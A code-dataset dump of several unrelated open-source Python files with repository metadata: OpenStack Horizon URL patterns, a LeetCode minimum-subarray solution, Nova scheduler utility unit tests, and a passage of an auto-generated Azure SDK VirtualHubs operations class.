] | 37 | 2018-10-30T02:47:24.000Z | 2021-12-04T10:29:40.000Z | openstack_dashboard/dashboards/identity/users/urls.py | nyzsirt/horizon | 53dd2dbd39c50b665ebe2d2a877496169f01a13f | [
"Apache-2.0"
] | 106 | 2019-01-18T03:06:55.000Z | 2019-11-29T05:06:18.000Z | openstack_dashboard/dashboards/identity/users/urls.py | nyzsirt/horizon | 53dd2dbd39c50b665ebe2d2a877496169f01a13f | [
"Apache-2.0"
] | 35 | 2018-11-26T03:36:31.000Z | 2021-12-04T10:29:41.000Z | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
from horizon.browsers.views import AngularIndexView
from openstack_dashboard.dashboards.identity.users import views
if settings.ANGULAR_FEATURES.get('users_panel', False):
title = _("Users")
# new angular panel
urlpatterns = [
url(r'^$', AngularIndexView.as_view(title=title), name='index'),
]
else:
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^(?P<user_id>[^/]+)/update/$',
views.UpdateView.as_view(), name='update'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(r'^(?P<user_id>[^/]+)/detail/$',
views.DetailView.as_view(), name='detail'),
url(r'^(?P<user_id>[^/]+)/change_password/$',
views.ChangePasswordView.as_view(), name='change_password'),
]
| 37.777778 | 78 | 0.687059 |
from django.conf import settings
from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
from horizon.browsers.views import AngularIndexView
from openstack_dashboard.dashboards.identity.users import views
if settings.ANGULAR_FEATURES.get('users_panel', False):
title = _("Users")
urlpatterns = [
url(r'^$', AngularIndexView.as_view(title=title), name='index'),
]
else:
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^(?P<user_id>[^/]+)/update/$',
views.UpdateView.as_view(), name='update'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(r'^(?P<user_id>[^/]+)/detail/$',
views.DetailView.as_view(), name='detail'),
url(r'^(?P<user_id>[^/]+)/change_password/$',
views.ChangePasswordView.as_view(), name='change_password'),
]
| true | true |
1c305d425e27330d2aa3609c94420ecd795e84a1 | 881 | py | Python | LeetCode/2019-01-22-209-Minimum-Size-Subarray-Sum.py | HeRuivio/-Algorithm | 1fbe6256630758fda3af68f469471ee246730afc | [
"MIT"
] | 5 | 2018-10-30T05:07:32.000Z | 2019-06-18T08:11:38.000Z | LeetCode/2019-01-22-209-Minimum-Size-Subarray-Sum.py | HeRuivio/-Algorithm | 1fbe6256630758fda3af68f469471ee246730afc | [
"MIT"
] | 1 | 2020-05-09T09:05:16.000Z | 2020-05-09T09:05:16.000Z | LeetCode/2019-01-22-209-Minimum-Size-Subarray-Sum.py | HeRuivio/-Algorithm | 1fbe6256630758fda3af68f469471ee246730afc | [
"MIT"
] | 2 | 2020-05-09T09:02:22.000Z | 2020-12-09T13:23:00.000Z | # -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-01-22 11:37:16
# @Last Modified by: 何睿
# @Last Modified time: 2019-01-22 11:37:16
import sys
class Solution:
def minSubArrayLen(self, s, nums):
"""
:type s: int
:type nums: List[int]
:rtype: int
"""
# 初始化长度
length = sys.maxsize
_sum, left, right = 0, 0, 0
while right < len(nums):
_sum += nums[right]
# 如果当前的和已经大于等于s
if _sum >= s:
# 我们将左指针向右移动,和小于s时跳出
while _sum >= s and left <= right:
_sum -= nums[left]
left += 1
# 更新长度
length = min(right - left + 2, length)
right += 1
# 如果length始终没有发生改变返回0,否则返回length本身
return length if length != sys.maxsize else 0
| 26.69697 | 54 | 0.466515 |
import sys
class Solution:
def minSubArrayLen(self, s, nums):
length = sys.maxsize
_sum, left, right = 0, 0, 0
while right < len(nums):
_sum += nums[right]
if _sum >= s:
while _sum >= s and left <= right:
_sum -= nums[left]
left += 1
length = min(right - left + 2, length)
right += 1
return length if length != sys.maxsize else 0
| true | true |
1c305d726d065f431ad67bbbb2f5919cb49ed614 | 15,133 | py | Python | nova/tests/unit/scheduler/test_scheduler_utils.py | bopopescu/nested_quota_final | 7c3454883de9f5368fa943924540eebe157a319d | [
"Apache-2.0"
] | 5 | 2017-06-23T07:37:39.000Z | 2020-10-21T07:07:50.000Z | nova/tests/unit/scheduler/test_scheduler_utils.py | bopopescu/nested_quota_final | 7c3454883de9f5368fa943924540eebe157a319d | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/scheduler/test_scheduler_utils.py | bopopescu/nested_quota_final | 7c3454883de9f5368fa943924540eebe157a319d | [
"Apache-2.0"
] | 4 | 2017-06-23T07:37:43.000Z | 2020-12-28T09:57:22.000Z | # Copyright (c) 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Scheduler Utils
"""
import contextlib
import uuid
import mock
from mox3 import mox
from oslo_config import cfg
from nova.compute import flavors
from nova.compute import utils as compute_utils
from nova import db
from nova import exception
from nova import notifications
from nova import objects
from nova import rpc
from nova.scheduler import utils as scheduler_utils
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_flavor
CONF = cfg.CONF
class SchedulerUtilsTestCase(test.NoDBTestCase):
"""Test case for scheduler utils methods."""
def setUp(self):
super(SchedulerUtilsTestCase, self).setUp()
self.context = 'fake-context'
@mock.patch('nova.objects.Flavor.get_by_flavor_id')
def test_build_request_spec_without_image(self, mock_get):
image = None
instance = {'uuid': 'fake-uuid'}
instance_type = objects.Flavor(**test_flavor.fake_flavor)
mock_get.return_value = objects.Flavor(extra_specs={})
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(mox.IgnoreArg()).AndReturn(instance_type)
self.mox.ReplayAll()
request_spec = scheduler_utils.build_request_spec(self.context, image,
[instance])
self.assertEqual({}, request_spec['image'])
def test_build_request_spec_with_object(self):
instance_type = objects.Flavor()
instance = fake_instance.fake_instance_obj(self.context)
with mock.patch.object(instance, 'get_flavor') as mock_get:
mock_get.return_value = instance_type
request_spec = scheduler_utils.build_request_spec(self.context,
None,
[instance])
mock_get.assert_called_once_with()
self.assertIsInstance(request_spec['instance_properties'], dict)
def test_set_vm_state_and_notify(self):
expected_uuid = 'fake-uuid'
request_spec = dict(instance_properties=dict(uuid='other-uuid'))
updates = dict(vm_state='fake-vm-state')
service = 'fake-service'
method = 'fake-method'
exc_info = 'exc_info'
self.mox.StubOutWithMock(compute_utils,
'add_instance_fault_from_exc')
self.mox.StubOutWithMock(notifications, 'send_update')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(rpc, 'get_notifier')
notifier = self.mox.CreateMockAnything()
rpc.get_notifier(service).AndReturn(notifier)
old_ref = 'old_ref'
new_ref = 'new_ref'
inst_obj = 'inst_obj'
db.instance_update_and_get_original(
self.context, expected_uuid, updates,
columns_to_join=['system_metadata']).AndReturn((old_ref, new_ref))
notifications.send_update(self.context, old_ref, inst_obj,
service=service)
compute_utils.add_instance_fault_from_exc(
self.context,
new_ref, exc_info, mox.IsA(tuple))
payload = dict(request_spec=request_spec,
instance_properties=request_spec.get(
'instance_properties', {}),
instance_id=expected_uuid,
state='fake-vm-state',
method=method,
reason=exc_info)
event_type = '%s.%s' % (service, method)
notifier.error(self.context, event_type, payload)
self.mox.ReplayAll()
with mock.patch.object(objects.Instance, '_from_db_object',
return_value=inst_obj):
scheduler_utils.set_vm_state_and_notify(self.context,
expected_uuid,
service,
method,
updates,
exc_info,
request_spec,
db)
def _test_populate_filter_props(self, host_state_obj=True,
with_retry=True,
force_hosts=None,
force_nodes=None):
if force_hosts is None:
force_hosts = []
if force_nodes is None:
force_nodes = []
if with_retry:
if not force_hosts and not force_nodes:
filter_properties = dict(retry=dict(hosts=[]))
else:
filter_properties = dict(force_hosts=force_hosts,
force_nodes=force_nodes)
else:
filter_properties = dict()
if host_state_obj:
class host_state(object):
host = 'fake-host'
nodename = 'fake-node'
limits = 'fake-limits'
else:
host_state = dict(host='fake-host',
nodename='fake-node',
limits='fake-limits')
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
if with_retry and not force_hosts and not force_nodes:
# So we can check for 2 hosts
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
if force_hosts:
expected_limits = None
else:
expected_limits = 'fake-limits'
self.assertEqual(expected_limits,
filter_properties.get('limits'))
if with_retry and not force_hosts and not force_nodes:
self.assertEqual([['fake-host', 'fake-node'],
['fake-host', 'fake-node']],
filter_properties['retry']['hosts'])
else:
self.assertNotIn('retry', filter_properties)
def test_populate_filter_props(self):
self._test_populate_filter_props()
def test_populate_filter_props_host_dict(self):
self._test_populate_filter_props(host_state_obj=False)
def test_populate_filter_props_no_retry(self):
self._test_populate_filter_props(with_retry=False)
def test_populate_filter_props_force_hosts_no_retry(self):
self._test_populate_filter_props(force_hosts=['force-host'])
def test_populate_filter_props_force_nodes_no_retry(self):
self._test_populate_filter_props(force_nodes=['force-node'])
@mock.patch.object(scheduler_utils, '_max_attempts')
def test_populate_retry_exception_at_max_attempts(self, _max_attempts):
_max_attempts.return_value = 2
msg = 'The exception text was preserved!'
filter_properties = dict(retry=dict(num_attempts=2, hosts=[],
exc=[msg]))
nvh = self.assertRaises(exception.NoValidHost,
scheduler_utils.populate_retry,
filter_properties, 'fake-uuid')
# make sure 'msg' is a substring of the complete exception text
self.assertIn(msg, nvh.message)
def _check_parse_options(self, opts, sep, converter, expected):
good = scheduler_utils.parse_options(opts,
sep=sep,
converter=converter)
for item in expected:
self.assertIn(item, good)
def test_parse_options(self):
# check normal
self._check_parse_options(['foo=1', 'bar=-2.1'],
'=',
float,
[('foo', 1.0), ('bar', -2.1)])
# check convert error
self._check_parse_options(['foo=a1', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
# check separator missing
self._check_parse_options(['foo', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
# check key missing
self._check_parse_options(['=5', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
def test_validate_filters_configured(self):
self.flags(scheduler_default_filters='FakeFilter1,FakeFilter2')
self.assertTrue(scheduler_utils.validate_filter('FakeFilter1'))
self.assertTrue(scheduler_utils.validate_filter('FakeFilter2'))
self.assertFalse(scheduler_utils.validate_filter('FakeFilter3'))
def _create_server_group(self, policy='anti-affinity'):
instance = fake_instance.fake_instance_obj(self.context,
params={'host': 'hostA'})
group = objects.InstanceGroup()
group.name = 'pele'
group.uuid = str(uuid.uuid4())
group.members = [instance.uuid]
group.policies = [policy]
return group
def _get_group_details(self, group, policy=None):
group_hosts = ['hostB']
with contextlib.nested(
mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
return_value=group),
mock.patch.object(objects.InstanceGroup, 'get_hosts',
return_value=['hostA']),
) as (get_group, get_hosts):
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(
self.context, 'fake_uuid', group_hosts)
self.assertEqual(
(set(['hostA', 'hostB']), [policy]),
group_info)
def test_get_group_details(self):
for policy in ['affinity', 'anti-affinity']:
group = self._create_server_group(policy)
self._get_group_details(group, policy=policy)
def test_get_group_details_with_no_affinity_filters(self):
self.flags(scheduler_default_filters=['fake'])
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(self.context,
'fake-uuid')
self.assertIsNone(group_info)
def test_get_group_details_with_no_instance_uuid(self):
self.flags(scheduler_default_filters=['fake'])
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(self.context, None)
self.assertIsNone(group_info)
def _get_group_details_with_filter_not_configured(self, policy):
wrong_filter = {
'affinity': 'ServerGroupAntiAffinityFilter',
'anti-affinity': 'ServerGroupAffinityFilter',
}
self.flags(scheduler_default_filters=[wrong_filter[policy]])
instance = fake_instance.fake_instance_obj(self.context,
params={'host': 'hostA'})
group = objects.InstanceGroup()
group.uuid = str(uuid.uuid4())
group.members = [instance.uuid]
group.policies = [policy]
with contextlib.nested(
mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
return_value=group),
mock.patch.object(objects.InstanceGroup, 'get_hosts',
return_value=['hostA']),
) as (get_group, get_hosts):
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
self.assertRaises(exception.UnsupportedPolicyException,
scheduler_utils._get_group_details,
self.context, 'fake-uuid')
def test_get_group_details_with_filter_not_configured(self):
policies = ['anti-affinity', 'affinity']
for policy in policies:
self._get_group_details_with_filter_not_configured(policy)
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_in_filter_properties(self, mock_ggd):
mock_ggd.return_value = scheduler_utils.GroupDetails(
hosts=set(['hostA', 'hostB']), policies=['policy'])
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
scheduler_utils.setup_instance_group(self.context, spec, filter_props)
mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
['hostC'])
expected_filter_props = {'group_updated': True,
'group_hosts': set(['hostA', 'hostB']),
'group_policies': ['policy']}
self.assertEqual(expected_filter_props, filter_props)
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_with_no_group(self, mock_ggd):
mock_ggd.return_value = None
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
scheduler_utils.setup_instance_group(self.context, spec, filter_props)
mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
['hostC'])
self.assertNotIn('group_updated', filter_props)
self.assertNotIn('group_policies', filter_props)
self.assertEqual(['hostC'], filter_props['group_hosts'])
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_with_filter_not_configured(self, mock_ggd):
mock_ggd.side_effect = exception.NoValidHost(reason='whatever')
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
self.assertRaises(exception.NoValidHost,
scheduler_utils.setup_instance_group,
self.context, spec, filter_props)
| 42.508427 | 78 | 0.58574 |
import contextlib
import uuid
import mock
from mox3 import mox
from oslo_config import cfg
from nova.compute import flavors
from nova.compute import utils as compute_utils
from nova import db
from nova import exception
from nova import notifications
from nova import objects
from nova import rpc
from nova.scheduler import utils as scheduler_utils
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_flavor
CONF = cfg.CONF
class SchedulerUtilsTestCase(test.NoDBTestCase):
def setUp(self):
super(SchedulerUtilsTestCase, self).setUp()
self.context = 'fake-context'
@mock.patch('nova.objects.Flavor.get_by_flavor_id')
def test_build_request_spec_without_image(self, mock_get):
image = None
instance = {'uuid': 'fake-uuid'}
instance_type = objects.Flavor(**test_flavor.fake_flavor)
mock_get.return_value = objects.Flavor(extra_specs={})
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(mox.IgnoreArg()).AndReturn(instance_type)
self.mox.ReplayAll()
request_spec = scheduler_utils.build_request_spec(self.context, image,
[instance])
self.assertEqual({}, request_spec['image'])
def test_build_request_spec_with_object(self):
instance_type = objects.Flavor()
instance = fake_instance.fake_instance_obj(self.context)
with mock.patch.object(instance, 'get_flavor') as mock_get:
mock_get.return_value = instance_type
request_spec = scheduler_utils.build_request_spec(self.context,
None,
[instance])
mock_get.assert_called_once_with()
self.assertIsInstance(request_spec['instance_properties'], dict)
def test_set_vm_state_and_notify(self):
expected_uuid = 'fake-uuid'
request_spec = dict(instance_properties=dict(uuid='other-uuid'))
updates = dict(vm_state='fake-vm-state')
service = 'fake-service'
method = 'fake-method'
exc_info = 'exc_info'
self.mox.StubOutWithMock(compute_utils,
'add_instance_fault_from_exc')
self.mox.StubOutWithMock(notifications, 'send_update')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(rpc, 'get_notifier')
notifier = self.mox.CreateMockAnything()
rpc.get_notifier(service).AndReturn(notifier)
old_ref = 'old_ref'
new_ref = 'new_ref'
inst_obj = 'inst_obj'
db.instance_update_and_get_original(
self.context, expected_uuid, updates,
columns_to_join=['system_metadata']).AndReturn((old_ref, new_ref))
notifications.send_update(self.context, old_ref, inst_obj,
service=service)
compute_utils.add_instance_fault_from_exc(
self.context,
new_ref, exc_info, mox.IsA(tuple))
payload = dict(request_spec=request_spec,
instance_properties=request_spec.get(
'instance_properties', {}),
instance_id=expected_uuid,
state='fake-vm-state',
method=method,
reason=exc_info)
event_type = '%s.%s' % (service, method)
notifier.error(self.context, event_type, payload)
self.mox.ReplayAll()
with mock.patch.object(objects.Instance, '_from_db_object',
return_value=inst_obj):
scheduler_utils.set_vm_state_and_notify(self.context,
expected_uuid,
service,
method,
updates,
exc_info,
request_spec,
db)
def _test_populate_filter_props(self, host_state_obj=True,
with_retry=True,
force_hosts=None,
force_nodes=None):
if force_hosts is None:
force_hosts = []
if force_nodes is None:
force_nodes = []
if with_retry:
if not force_hosts and not force_nodes:
filter_properties = dict(retry=dict(hosts=[]))
else:
filter_properties = dict(force_hosts=force_hosts,
force_nodes=force_nodes)
else:
filter_properties = dict()
if host_state_obj:
class host_state(object):
host = 'fake-host'
nodename = 'fake-node'
limits = 'fake-limits'
else:
host_state = dict(host='fake-host',
nodename='fake-node',
limits='fake-limits')
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
if with_retry and not force_hosts and not force_nodes:
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
if force_hosts:
expected_limits = None
else:
expected_limits = 'fake-limits'
self.assertEqual(expected_limits,
filter_properties.get('limits'))
if with_retry and not force_hosts and not force_nodes:
self.assertEqual([['fake-host', 'fake-node'],
['fake-host', 'fake-node']],
filter_properties['retry']['hosts'])
else:
self.assertNotIn('retry', filter_properties)
def test_populate_filter_props(self):
self._test_populate_filter_props()
def test_populate_filter_props_host_dict(self):
self._test_populate_filter_props(host_state_obj=False)
def test_populate_filter_props_no_retry(self):
self._test_populate_filter_props(with_retry=False)
def test_populate_filter_props_force_hosts_no_retry(self):
self._test_populate_filter_props(force_hosts=['force-host'])
def test_populate_filter_props_force_nodes_no_retry(self):
self._test_populate_filter_props(force_nodes=['force-node'])
@mock.patch.object(scheduler_utils, '_max_attempts')
def test_populate_retry_exception_at_max_attempts(self, _max_attempts):
_max_attempts.return_value = 2
msg = 'The exception text was preserved!'
filter_properties = dict(retry=dict(num_attempts=2, hosts=[],
exc=[msg]))
nvh = self.assertRaises(exception.NoValidHost,
scheduler_utils.populate_retry,
filter_properties, 'fake-uuid')
self.assertIn(msg, nvh.message)
def _check_parse_options(self, opts, sep, converter, expected):
good = scheduler_utils.parse_options(opts,
sep=sep,
converter=converter)
for item in expected:
self.assertIn(item, good)
def test_parse_options(self):
self._check_parse_options(['foo=1', 'bar=-2.1'],
'=',
float,
[('foo', 1.0), ('bar', -2.1)])
self._check_parse_options(['foo=a1', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
self._check_parse_options(['foo', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
self._check_parse_options(['=5', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
def test_validate_filters_configured(self):
self.flags(scheduler_default_filters='FakeFilter1,FakeFilter2')
self.assertTrue(scheduler_utils.validate_filter('FakeFilter1'))
self.assertTrue(scheduler_utils.validate_filter('FakeFilter2'))
self.assertFalse(scheduler_utils.validate_filter('FakeFilter3'))
def _create_server_group(self, policy='anti-affinity'):
instance = fake_instance.fake_instance_obj(self.context,
params={'host': 'hostA'})
group = objects.InstanceGroup()
group.name = 'pele'
group.uuid = str(uuid.uuid4())
group.members = [instance.uuid]
group.policies = [policy]
return group
def _get_group_details(self, group, policy=None):
group_hosts = ['hostB']
with contextlib.nested(
mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
return_value=group),
mock.patch.object(objects.InstanceGroup, 'get_hosts',
return_value=['hostA']),
) as (get_group, get_hosts):
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(
self.context, 'fake_uuid', group_hosts)
self.assertEqual(
(set(['hostA', 'hostB']), [policy]),
group_info)
def test_get_group_details(self):
for policy in ['affinity', 'anti-affinity']:
group = self._create_server_group(policy)
self._get_group_details(group, policy=policy)
def test_get_group_details_with_no_affinity_filters(self):
self.flags(scheduler_default_filters=['fake'])
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(self.context,
'fake-uuid')
self.assertIsNone(group_info)
def test_get_group_details_with_no_instance_uuid(self):
self.flags(scheduler_default_filters=['fake'])
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(self.context, None)
self.assertIsNone(group_info)
def _get_group_details_with_filter_not_configured(self, policy):
wrong_filter = {
'affinity': 'ServerGroupAntiAffinityFilter',
'anti-affinity': 'ServerGroupAffinityFilter',
}
self.flags(scheduler_default_filters=[wrong_filter[policy]])
instance = fake_instance.fake_instance_obj(self.context,
params={'host': 'hostA'})
group = objects.InstanceGroup()
group.uuid = str(uuid.uuid4())
group.members = [instance.uuid]
group.policies = [policy]
with contextlib.nested(
mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
return_value=group),
mock.patch.object(objects.InstanceGroup, 'get_hosts',
return_value=['hostA']),
) as (get_group, get_hosts):
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
self.assertRaises(exception.UnsupportedPolicyException,
scheduler_utils._get_group_details,
self.context, 'fake-uuid')
def test_get_group_details_with_filter_not_configured(self):
policies = ['anti-affinity', 'affinity']
for policy in policies:
self._get_group_details_with_filter_not_configured(policy)
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_in_filter_properties(self, mock_ggd):
mock_ggd.return_value = scheduler_utils.GroupDetails(
hosts=set(['hostA', 'hostB']), policies=['policy'])
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
scheduler_utils.setup_instance_group(self.context, spec, filter_props)
mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
['hostC'])
expected_filter_props = {'group_updated': True,
'group_hosts': set(['hostA', 'hostB']),
'group_policies': ['policy']}
self.assertEqual(expected_filter_props, filter_props)
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_with_no_group(self, mock_ggd):
mock_ggd.return_value = None
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
scheduler_utils.setup_instance_group(self.context, spec, filter_props)
mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
['hostC'])
self.assertNotIn('group_updated', filter_props)
self.assertNotIn('group_policies', filter_props)
self.assertEqual(['hostC'], filter_props['group_hosts'])
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_with_filter_not_configured(self, mock_ggd):
mock_ggd.side_effect = exception.NoValidHost(reason='whatever')
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
self.assertRaises(exception.NoValidHost,
scheduler_utils.setup_instance_group,
self.context, spec, filter_props)
| true | true |
1c305da171d9418019b885143f595ffe0a236515 | 33,113 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_virtual_hubs_operations.py | beltr0n/azure-sdk-for-python | 2f7fb8bee881b0fc0386a0ad5385755ceedd0453 | [
"MIT"
] | 2 | 2021-03-24T06:26:11.000Z | 2021-04-18T15:55:59.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_virtual_hubs_operations.py | beltr0n/azure-sdk-for-python | 2f7fb8bee881b0fc0386a0ad5385755ceedd0453 | [
"MIT"
] | 4 | 2019-04-17T17:57:49.000Z | 2020-04-24T21:11:22.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_virtual_hubs_operations.py | beltr0n/azure-sdk-for-python | 2f7fb8bee881b0fc0386a0ad5385755ceedd0453 | [
"MIT"
] | 2 | 2021-05-23T16:46:31.000Z | 2021-05-26T23:51:09.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualHubsOperations:
"""VirtualHubsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> "_models.VirtualHub":
"""Retrieves the details of a VirtualHub.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualHub, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_06_01.models.VirtualHub
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHub"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualHub', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_hub_name: str,
virtual_hub_parameters: "_models.VirtualHub",
**kwargs
) -> "_models.VirtualHub":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHub"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
